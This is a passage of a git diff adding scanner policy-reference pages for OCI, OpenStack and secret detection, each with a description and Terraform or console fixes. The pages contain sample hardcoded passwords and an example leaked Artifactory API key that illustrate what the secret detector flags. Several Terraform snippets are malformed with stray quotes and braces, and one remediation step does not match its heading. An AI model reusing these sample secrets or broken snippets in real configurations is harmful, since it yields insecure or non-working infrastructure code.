https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/SecurityListIngressStateless.py[CKV_OCI_17] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This policy identifies the OCI Virtual Cloud Networks (VCN) security lists that have stateful ingress rules configured 
in their security lists. +It is recommended that Virtual Cloud Networks (VCN) security lists are configured with stateless ingress rules to slow the impact of a denial-of-service (DoS) attack. + +//// +=== Fix - Runtime + + +* OCI Console* + + + +. Login to the OCI Console + +. Type the resource reported in the alert into the Search box at the top of the Console. + +. Click the resource reported in the alert from the Resources submenu + +. Click on Ingress rule where Stateless column is set to No + +. Click on Edit + +. Select the checkbox STATELESS + +. Click on Save Changes +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* oci_core_security_list +* *Arguments:* vcn_id + ingress_security_rule + + +[source,go] +---- +{ + "resource "oci_core_security_list" "pass" { + compartment_id = oci_identity_compartment.tf-compartment.id + vcn_id = oci_core_vcn.test_vcn.id + ingress_security_rules { + protocol = "all" + source="192.168.1.0/24" + } + +}", +} +---- + diff --git a/code-security/policy-reference/oci-policies/networking/networking.adoc b/code-security/policy-reference/oci-policies/networking/networking.adoc new file mode 100644 index 000000000..4fa64f1ab --- /dev/null +++ b/code-security/policy-reference/oci-policies/networking/networking.adoc @@ -0,0 +1,39 @@ +== Networking + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:ensure-oci-security-group-has-stateless-ingress-security-rules.adoc[OCI Network Security Groups (NSG) has stateful security rules] +| Not Supported +| + + +|xref:ensure-oci-security-groups-rules-do-not-allow-ingress-from-00000-to-port-22.adoc[OCI security groups rules allows ingress from 0.0.0.0/0 to port 22] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/AbsSecurityGroupUnrestrictedIngress.py[CKV_OCI_22] +|LOW + + +|xref:ensure-oci-security-list-does-not-allow-ingress-from-00000-to-port-22.adoc[OCI Security Lists with Unrestricted traffic to port 22] +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/SecurityListUnrestrictedIngress22.py[CKV_OCI_19] +|LOW + + +|xref:ensure-oci-security-list-does-not-allow-ingress-from-00000-to-port-3389.adoc[OCI security list allows ingress from 0.0.0.0/0 to port 3389] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/SecurityListUnrestrictedIngress3389.py[CKV_OCI_20] +|LOW + + +|xref:ensure-vcn-has-an-inbound-security-list.adoc[OCI VCN has no inbound security list] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/SecurityListIngress.py[CKV_OCI_16] +|HIGH + + +|xref:ensure-vcn-inbound-security-lists-are-stateless.adoc[OCI VCN Security list has stateful security rules] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/SecurityListIngressStateless.py[CKV_OCI_17] +|HIGH + + +|=== + diff --git a/code-security/policy-reference/oci-policies/oci-policies.adoc b/code-security/policy-reference/oci-policies/oci-policies.adoc new file mode 100644 index 000000000..3a80d5d4e --- /dev/null +++ b/code-security/policy-reference/oci-policies/oci-policies.adoc @@ -0,0 +1,3 @@ +== OCI Policies + + diff --git a/code-security/policy-reference/oci-policies/secrets-1/bc-oci-secrets-1.adoc b/code-security/policy-reference/oci-policies/secrets-1/bc-oci-secrets-1.adoc new file mode 100644 index 000000000..9b94daf80 --- /dev/null +++ b/code-security/policy-reference/oci-policies/secrets-1/bc-oci-secrets-1.adoc @@ -0,0 +1,81 @@ +== OCI private keys are hard coded in the provider + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| c2518002-c26a-4bc3-b4dd-df2675cd320b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/provider/oci/credentials.py[CKV_OCI_1] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + +//// 
+//// + + +=== Description + + +When accessing OCI programmatically, users can use a password-protected certificate. +Including that password in files that are checked into a repository leaves you exposed to account hijacking. +We recommend using a secrets store or security tokens for secure access. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +provider "oci" { +- private_key_password = "secretPassword" +} +---- + diff --git a/code-security/policy-reference/oci-policies/secrets-1/secrets-1.adoc b/code-security/policy-reference/oci-policies/secrets-1/secrets-1.adoc new file mode 100644 index 000000000..1ca0af8f2 --- /dev/null +++ b/code-security/policy-reference/oci-policies/secrets-1/secrets-1.adoc @@ -0,0 +1,14 @@ +== Secrets 1 + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:bc-oci-secrets-1.adoc[OCI private keys are hard coded in the provider] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/provider/oci/credentials.py[CKV_OCI_1] +|HIGH + + +|=== + diff --git a/code-security/policy-reference/oci-policies/storage/ensure-oci-block-storage-block-volume-has-backup-enabled.adoc b/code-security/policy-reference/oci-policies/storage/ensure-oci-block-storage-block-volume-has-backup-enabled.adoc new file mode 100644 index 000000000..7719639f5 --- /dev/null +++ b/code-security/policy-reference/oci-policies/storage/ensure-oci-block-storage-block-volume-has-backup-enabled.adoc @@ -0,0 +1,85 @@ +== OCI Block Storage Block Volume does not have
backup enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 142959c0-6cd5-4d66-8bf5-54246de46e28 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/StorageBlockBackupEnabled.py[CKV_OCI_2] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This policy identifies the OCI Block Storage Volumes that do not have backup enabled. +It is recommended to have a block volume backup policy on each block volume so that the block volume can be restored during data loss events. + +//// +=== Fix - Runtime + + +* OCI Console* + + + +. Login to the OCI Console + +. Type the resource reported in the alert into the Search box at the top of the Console. + +. Click the resource reported in the alert from the Resources submenu + +. Click on Edit button + +. Select the Backup Policy from the Backup Policies section as appropriate + +. Click Save Changes +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* oci_core_volume +* *Arguments:* backup_policy_id + + +[source,go] +---- +{ + "resource "oci_core_volume" "pass" { + #Required + compartment_id = var.compartment_id + + #Optional + availability_domain = var.volume_availability_domain + backup_policy_id = data.oci_core_volume_backup_policies.test_volume_backup_policies.volume_backup_policies.0.id + block_volume_replicas { + #Required + availability_domain = var.volume_block_volume_replicas_availability_domain + +...
+}", + +} +---- + diff --git a/code-security/policy-reference/oci-policies/storage/ensure-oci-file-system-is-encrypted-with-a-customer-managed-key.adoc b/code-security/policy-reference/oci-policies/storage/ensure-oci-file-system-is-encrypted-with-a-customer-managed-key.adoc new file mode 100644 index 000000000..dfea7af37 --- /dev/null +++ b/code-security/policy-reference/oci-policies/storage/ensure-oci-file-system-is-encrypted-with-a-customer-managed-key.adoc @@ -0,0 +1,79 @@ +== OCI File Storage File Systems are not encrypted with a Customer Managed Key (CMK) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| cbc96be0-96a1-4586-8a3d-5dc5a8d74c22 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/FileSystemEncryption.py[CKV_OCI_15] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This policy identifies the OCI File Storage File Systems that are not encrypted with a Customer Managed Key (CMK). +It is recommended that File Storage File Systems be encrypted with a Customer Managed Key (CMK); using a CMK provides an additional level of security on your data by allowing you to manage the encryption key lifecycle for the File System. + +//// +=== Fix - Runtime + + +* OCI Console* + + + +. Login to the OCI Console + +. Type the resource reported in the alert into the Search box at the top of the Console. + +. Click the resource reported in the alert from the Resources submenu + +. Click Assign next to Encryption Key: Oracle managed key. + +. Select a Vault from the appropriate compartment + +. Select a Master Encryption Key + +. Click Assign +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* oci_file_storage_file_system +* *Arguments:* kms_key_id + + +[source,go] +---- +{ + "resource "oci_file_storage_file_system" "pass" { + ...
+ kms_key_id = oci_kms_key.test_key.id + ... +}", + +} +---- + diff --git a/code-security/policy-reference/oci-policies/storage/ensure-oci-object-storage-bucket-can-emit-object-events.adoc b/code-security/policy-reference/oci-policies/storage/ensure-oci-object-storage-bucket-can-emit-object-events.adoc new file mode 100644 index 000000000..3bd6b2f1d --- /dev/null +++ b/code-security/policy-reference/oci-policies/storage/ensure-oci-object-storage-bucket-can-emit-object-events.adoc @@ -0,0 +1,78 @@ +== OCI Object Storage bucket does not emit object events + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 14a55666-d997-4a62-8f98-fed0efec0977 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/ObjectStorageEmitEvents.py[CKV_OCI_7] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This policy identifies the OCI Object Storage buckets that do not emit object events. +Monitoring and alerting on object events will help in identifying changes to bucket objects. +It is recommended that buckets be enabled to emit object events. + +//// +=== Fix - Runtime + + +* OCI Console* + + + +. Login to the OCI Console + +. Type the resource reported in the alert into the Search box at the top of the Console. + +. Click the resource reported in the alert from the Resources submenu + +. Next to Emit Object Events, click Edit. + +. In the dialog box, select EMIT OBJECT EVENTS (to enable). + +. Click Save Changes. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* oci_objectstorage_bucket +* *Arguments:* object_events_enabled + + +[source,go] +---- +{ + "resource "oci_objectstorage_bucket" "pass" { + ... + object_events_enabled = true +...
+}", + +} +---- + diff --git a/code-security/policy-reference/oci-policies/storage/ensure-oci-object-storage-has-versioning-enabled.adoc b/code-security/policy-reference/oci-policies/storage/ensure-oci-object-storage-has-versioning-enabled.adoc new file mode 100644 index 000000000..3790e618e --- /dev/null +++ b/code-security/policy-reference/oci-policies/storage/ensure-oci-object-storage-has-versioning-enabled.adoc @@ -0,0 +1,75 @@ +== OCI Object Storage Bucket has object Versioning disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 24260955-1b50-410a-b24f-48598b5e041d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/ObjectStorageVersioning.py[CKV_OCI_8] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This policy identifies the OCI Object Storage buckets that are not configured with Object Versioning. +It is recommended that Object Storage buckets be configured with Object Versioning to minimize data loss because of inadvertent deletes by an authorized user or malicious deletes. + +//// +=== Fix - Runtime + + +* OCI Console* + + + +. Login to the OCI Console + +. Type the resource reported in the alert into the Search box at the top of the Console. + +. Click the resource reported in the alert from the Resources submenu + +. Next to Object Versioning, click Edit. + +. In the dialog box, click Enable Versioning (to enable). +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* oci_objectstorage_bucket +* *Arguments:* versioning + + +[source,go] +---- +{ + "resource "oci_objectstorage_bucket" "pass" { + ...
+ + versioning = "Enabled" +}", + +} +---- + diff --git a/code-security/policy-reference/oci-policies/storage/ensure-oci-object-storage-is-encrypted-with-customer-managed-key.adoc b/code-security/policy-reference/oci-policies/storage/ensure-oci-object-storage-is-encrypted-with-customer-managed-key.adoc new file mode 100644 index 000000000..e7365af9f --- /dev/null +++ b/code-security/policy-reference/oci-policies/storage/ensure-oci-object-storage-is-encrypted-with-customer-managed-key.adoc @@ -0,0 +1,79 @@ +== OCI Object Storage Bucket is not encrypted with a Customer Managed Key (CMK) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b28c3bfd-87bc-4a55-8b59-cd42b02028e6 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/ObjectStorageEncryption.py[CKV_OCI_9] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This policy identifies the OCI Object Storage buckets that are not encrypted with a Customer Managed Key (CMK). +It is recommended that Object Storage buckets be encrypted with a Customer Managed Key (CMK); using a CMK provides an additional level of security on your data by allowing you to manage the encryption key lifecycle for the bucket. + +//// +=== Fix - Runtime + + +* OCI Console* + + + +. Login to the OCI Console + +. Type the resource reported in the alert into the Search box at the top of the Console. + +. Click the resource reported in the alert from the Resources submenu + +. Click Assign next to Encryption Key: Oracle managed key. + +. Select a Vault from the appropriate compartment + +. Select a Master Encryption Key + +. Click Assign +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* oci_objectstorage_bucket +* *Arguments:* kms_key_id + + +[source,go] +---- +{ + "resource "oci_objectstorage_bucket" "pass" { + ...
+ kms_key_id = var.oci_kms_key.id + ... +}", + +} +---- + diff --git a/code-security/policy-reference/oci-policies/storage/ensure-oci-object-storage-is-not-public.adoc b/code-security/policy-reference/oci-policies/storage/ensure-oci-object-storage-is-not-public.adoc new file mode 100644 index 000000000..9eb7b0642 --- /dev/null +++ b/code-security/policy-reference/oci-policies/storage/ensure-oci-object-storage-is-not-public.adoc @@ -0,0 +1,78 @@ +== OCI Object Storage bucket is publicly accessible + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 9270d89e-b1ef-4949-8190-449ee1c99a0d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/ObjectStoragePublic.py[CKV_OCI_10] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This policy identifies the OCI Object Storage buckets that are publicly accessible. +Monitoring and alerting on publicly accessible buckets will help in identifying changes to the security posture and thus reduces risk for sensitive data being leaked. +It is recommended that no bucket be publicly accessible. + +//// +=== Fix - Runtime + + +* OCI Console* + + + +. Login to the OCI Console + +. Type the resource reported in the alert into the Search box at the top of the Console. + +. Click the resource reported in the alert from the Resources submenu + +. Click on the Edit Visibility + +. Select Visibility as Private + +. Click Save Changes +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* oci_objectstorage_bucket +* *Arguments:* access_type + + +[source,go] +---- +{ + "resource "oci_objectstorage_bucket" "pass2" { +... + access_type = "NoPublicAccess" +... 
+}", + +} +---- + diff --git a/code-security/policy-reference/oci-policies/storage/oci-block-storage-block-volumes-are-not-encrypted-with-a-customer-managed-key-cmk.adoc b/code-security/policy-reference/oci-policies/storage/oci-block-storage-block-volumes-are-not-encrypted-with-a-customer-managed-key-cmk.adoc new file mode 100644 index 000000000..b195e184f --- /dev/null +++ b/code-security/policy-reference/oci-policies/storage/oci-block-storage-block-volumes-are-not-encrypted-with-a-customer-managed-key-cmk.adoc @@ -0,0 +1,94 @@ +== OCI Block Storage Block Volumes are not encrypted with a Customer Managed Key (CMK) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7ef4404e-a110-4dd5-b518-ec79fa3d5e9d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/StorageBlockEncryption.py[CKV_OCI_3] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This policy identifies the OCI Block Storage Volumes that are not encrypted with a Customer Managed Key (CMK). +It is recommended that Block Storage Volumes be encrypted with a Customer Managed Key (CMK); using a CMK provides an additional level of security on your data by allowing you to manage the encryption key lifecycle for the Block Storage Volume. + +//// +=== Fix - Runtime + + +* OCI Console* + + + +. Login to the OCI Console + +. Type the resource reported in the alert into the Search box at the top of the Console. + +. Click the resource reported in the alert from the Resources submenu + +. Click Assign next to Encryption Key: Oracle managed key. + +. Select a Vault from the appropriate compartment + +. Select a Master Encryption Key + +. 
Click Assign +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* oci_core_volume +* *Arguments:* kms_key_id + + +[source,go] +---- +resource "oci_core_volume" "pass" { + #Required + compartment_id = var.compartment_id + availability_domain = var.volume_block_volume_replicas_availability_domain + + defined_tags = { "Operations.CostCenter" = "42" } + display_name = var.volume_display_name + freeform_tags = { "Department" = "Finance" } + is_auto_tune_enabled = var.volume_is_auto_tune_enabled + kms_key_id = oci_kms_key.test_key.id + size_in_gbs = var.volume_size_in_gbs + size_in_mbs = var.volume_size_in_mbs + source_details { + #Required + id = var.volume_source_details_id + type = var.volume_source_details_type + } +} +---- + diff --git a/code-security/policy-reference/oci-policies/storage/storage.adoc b/code-security/policy-reference/oci-policies/storage/storage.adoc new file mode 100644 index 000000000..c7f905c43 --- /dev/null +++ b/code-security/policy-reference/oci-policies/storage/storage.adoc @@ -0,0 +1,44 @@ +== Storage + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:ensure-oci-block-storage-block-volume-has-backup-enabled.adoc[OCI Block Storage Block Volume does not have backup enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/StorageBlockBackupEnabled.py[CKV_OCI_2] +|HIGH + + +|xref:ensure-oci-file-system-is-encrypted-with-a-customer-managed-key.adoc[OCI File Storage File Systems are not encrypted with a Customer Managed Key (CMK)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/FileSystemEncryption.py[CKV_OCI_15] +|HIGH + + +|xref:ensure-oci-object-storage-bucket-can-emit-object-events.adoc[OCI Object Storage bucket does not emit object events] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/ObjectStorageEmitEvents.py[CKV_OCI_7] +|HIGH + + 
+|xref:ensure-oci-object-storage-has-versioning-enabled.adoc[OCI Object Storage Bucket has object Versioning disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/ObjectStorageVersioning.py[CKV_OCI_8] +|HIGH + + +|xref:ensure-oci-object-storage-is-encrypted-with-customer-managed-key.adoc[OCI Object Storage Bucket is not encrypted with a Customer Managed Key (CMK)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/ObjectStorageEncryption.py[CKV_OCI_9] +|HIGH + + +|xref:ensure-oci-object-storage-is-not-public.adoc[OCI Object Storage bucket is publicly accessible] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/ObjectStoragePublic.py[CKV_OCI_10] +|HIGH + + +|xref:oci-block-storage-block-volumes-are-not-encrypted-with-a-customer-managed-key-cmk.adoc[OCI Block Storage Block Volumes are not encrypted with a Customer Managed Key (CMK)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/StorageBlockEncryption.py[CKV_OCI_3] +|HIGH + + +|=== + diff --git a/code-security/policy-reference/openstack-policies/openstack-policies.adoc b/code-security/policy-reference/openstack-policies/openstack-policies.adoc new file mode 100644 index 000000000..a886439f5 --- /dev/null +++ b/code-security/policy-reference/openstack-policies/openstack-policies.adoc @@ -0,0 +1,3 @@ +== Openstack Policies + + diff --git a/code-security/policy-reference/openstack-policies/openstack-policy-index/bc-openstack-networking-2.adoc b/code-security/policy-reference/openstack-policies/openstack-policy-index/bc-openstack-networking-2.adoc new file mode 100644 index 000000000..2e4f5ebad --- /dev/null +++ b/code-security/policy-reference/openstack-policies/openstack-policy-index/bc-openstack-networking-2.adoc @@ -0,0 +1,62 @@ +== OpenStack Security groups allow ingress from 0.0.0.0:0 to port 3389 (tcp / udp) + + +=== Policy Details + 
+[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 2c994aa0-eadb-438a-ad2d-fdd74df04c9e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress3389.py[CKV_OPENSTACK_3] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +In OpenStack, firewall rules are used to allow or deny traffic to or from a specific network or subnet. +When you create a firewall rule, you can specify the destination IP address or range that the rule applies to. +This allows you to control which traffic is allowed or denied based on the destination IP of the traffic. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* openstack_compute_secgroup_v2 +* *Arguments:* rule.to_port + rule.from_port + + +[source,go] +---- +{ + " resource "openstack_compute_secgroup_v2" "secgroup_1" { + name = "my_secgroup" + description = "my security group" + + rule { + from_port = 3389 + to_port = 3389 + ip_protocol = "tcp" + from_group_id = "5338c192-5118-11ec-bf63-0242ac130002" + } + + }", +} +---- + diff --git a/code-security/policy-reference/openstack-policies/openstack-policy-index/ensure-openstack-firewall-rule-has-destination-ip-configured.adoc b/code-security/policy-reference/openstack-policies/openstack-policy-index/ensure-openstack-firewall-rule-has-destination-ip-configured.adoc new file mode 100644 index 000000000..482aac047 --- /dev/null +++ b/code-security/policy-reference/openstack-policies/openstack-policy-index/ensure-openstack-firewall-rule-has-destination-ip-configured.adoc @@ -0,0 +1,62 @@ +== OpenStack firewall rule does not have destination IP configured + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 245d30b8-6f46-40c1-bc54-a0a80347c436 + +|Checkov Check ID +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/openstack/FirewallRuleSetDestinationIP.py[CKV_OPENSTACK_5] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Explicitly setting a destination IP address makes sure that the IP destination is managed in code. +You also need to ensure that the destination IP is not 0.0.0.0 so that the firewall rule is not exposed to the world. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* openstack_fw_rule_v1 +* *Arguments:* destination_ip_address + +[source,go] +---- +resource "openstack_fw_rule_v1" "pass" { +name = "my_rule" +description = "allow SSH from the admin subnet" +action = "allow" +protocol = "tcp" +destination_ip_address = "10.0.0.1" +destination_port = "22" +enabled = "true" +} +---- + + + +*CLI* + + +---- +openstack firewall group rule create --destination-ip-address 10.0.0.1 +---- diff --git a/code-security/policy-reference/openstack-policies/openstack-policy-index/ensure-openstack-instance-does-not-use-basic-credentials.adoc b/code-security/policy-reference/openstack-policies/openstack-policy-index/ensure-openstack-instance-does-not-use-basic-credentials.adoc new file mode 100644 index 000000000..6fee94630 --- /dev/null +++ b/code-security/policy-reference/openstack-policies/openstack-policy-index/ensure-openstack-instance-does-not-use-basic-credentials.adoc @@ -0,0 +1,59 @@ +== OpenStack instance use basic credentials + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 0784c873-e95d-4b13-ae13-aa50dcf28bd3 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/openstack/ComputeInstanceAdminPassword.py[CKV_OPENSTACK_4] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +When managing a compute instance in Terraform, you can override the root password using admin_pass.
+However, this is stored in plaintext and therefore exposes the root password to credential theft.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* openstack_compute_instance_v2
+* *Arguments:* admin_pass
+
+[source,go]
+----
+resource "openstack_compute_instance_v2" "fail" {
+  name            = "basic"
+  image_id        = "ad091b52-742f-469e-8f3c-fd81cadf0743"
+  flavor_id       = "3"
+- admin_pass      = "N0tSoS3cretP4ssw0rd"
+  security_groups = ["default"]
+  user_data       = "#cloud-config
+    hostname: instance_1.example.com
+    fqdn: instance_1.example.com"
+
+  network {
+    name = "my_network"
+  }
+}
+----
diff --git a/code-security/policy-reference/openstack-policies/openstack-policy-index/openstack-policy-index.adoc b/code-security/policy-reference/openstack-policies/openstack-policy-index/openstack-policy-index.adoc
new file mode 100644
index 000000000..f0f984896
--- /dev/null
+++ b/code-security/policy-reference/openstack-policies/openstack-policy-index/openstack-policy-index.adoc
@@ -0,0 +1,24 @@
+== OpenStack Policy Index
+
+[width=85%]
+[cols="1,1,1"]
+|===
+|Policy|Checkov Check ID| Severity
+
+|xref:bc-openstack-networking-2.adoc[OpenStack Security groups allow ingress from 0.0.0.0:0 to port 3389 (tcp / udp)]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress3389.py[CKV_OPENSTACK_3]
+|LOW
+
+
+|xref:ensure-openstack-firewall-rule-has-destination-ip-configured.adoc[OpenStack firewall rule does not have destination IP configured]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/openstack/FirewallRuleSetDestinationIP.py[CKV_OPENSTACK_5]
+|LOW
+
+
+|xref:ensure-openstack-instance-does-not-use-basic-credentials.adoc[OpenStack instance uses basic credentials]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/openstack/ComputeInstanceAdminPassword.py[CKV_OPENSTACK_4]
+|LOW
+
+
+|===
+
diff --git a/code-security/policy-reference/secrets-policies/secrets-policies.adoc b/code-security/policy-reference/secrets-policies/secrets-policies.adoc
new file mode 100644
index 000000000..7d4d35ca9
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policies.adoc
@@ -0,0 +1,3 @@
+== Secrets Policies
+
+
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/ensure-repository-is-private.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/ensure-repository-is-private.adoc
new file mode 100644
index 000000000..66ca949d2
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/ensure-repository-is-private.adoc
@@ -0,0 +1,44 @@
+== GitHub repository is not private
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| f620ff53-e5d6-45a1-b68b-83bc35f7e946
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/github/PrivateRepo.py[CKV_GIT_1]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+When you create a GitHub repository, you specify whether it's private or public, and you can change this setting at any time.
+If your repository is public, anyone can access and fork it.
+If your repository is private, you can specify exactly who can access your repository and whether they can fork it.
+
+=== Fix - Buildtime
+
+
+*GitHub*
+
+WARNING: Changing visibility may break references to the repository.
+
+
+* On GitHub.com, navigate to the repository.
+* In the menu bar under the repository name, click *Settings*.
+* In the "Danger Zone" section, click *Change repository visibility*.
+* Choose *Private*.
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-1.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-1.adoc
new file mode 100644
index 000000000..23db979c4
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-1.adoc
@@ -0,0 +1,83 @@
+== Artifactory Credentials
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| a3934796-b64a-4295-849f-417651ecae8b
+
+|Checkov Check ID
+|CKV_SECRET_1
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+Artifactory is a repository manager that functions as a single access point organizing all of your binary resources, including proprietary libraries, remote artifacts, and other third-party resources.
+A leaked API key looks like this:
+
+[source,text]
+----
+apikey: AKCp5budTFpbypBqQbGJPz3pGCi28pPivfWczqjfYb9drAmd9LbRZbj6UpKFxJXA8ksWGc9fM
+----
+
+=== Fix - Buildtime
+
+
+*Artifactory*
+
+
+
+. Revoke the exposed secret.
++
+The key can be revoked from the user profile or through the API.
++
+
+[source,text]
+----
+## Revoke API Key
+Description: Revokes the current user's API key
+Since: 4.3.0
+Usage: DELETE /api/security/apiKey
+Produces: application/json
+
+## Revoke User API Key
+Description: Revokes the API key of another user
+Since: 4.3.0
+Security: Requires a privileged user (Admin only)
+Usage: DELETE /api/security/apiKey/{username}
+Produces: application/json
+
+## Revoke All API Keys
+Description: Revokes all API keys currently defined in the system
+Since: 4.3.0
+Security: Requires a privileged user (Admin only)
+Usage: DELETE /api/security/apiKey?deleteAll={0/1}
+Produces: application/json
+----
+
+. Clean the git history.
++
+Go under the settings section of your GitHub project and choose the change visibility button at the bottom.
+
+. Inspect JFrog access logs to ensure the key was not utilized during the compromised period.
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-11.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-11.adoc
new file mode 100644
index 000000000..dd040d25e
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-11.adoc
@@ -0,0 +1,57 @@
+== Mailchimp Access Key
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 73ce6819-d605-4d89-a126-69eb2cd099f1
+
+|Checkov Check ID
+|CKV_SECRET_11
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+This check detects a Mailchimp access key referenced in your source code.
+The key enables an authenticated user to perform operational and management activities exposed by Mailchimp's developer API service.
+
+=== Fix - Buildtime
+
+
+*Mailchimp*
+
+
+
+. Revoke the secret.
++
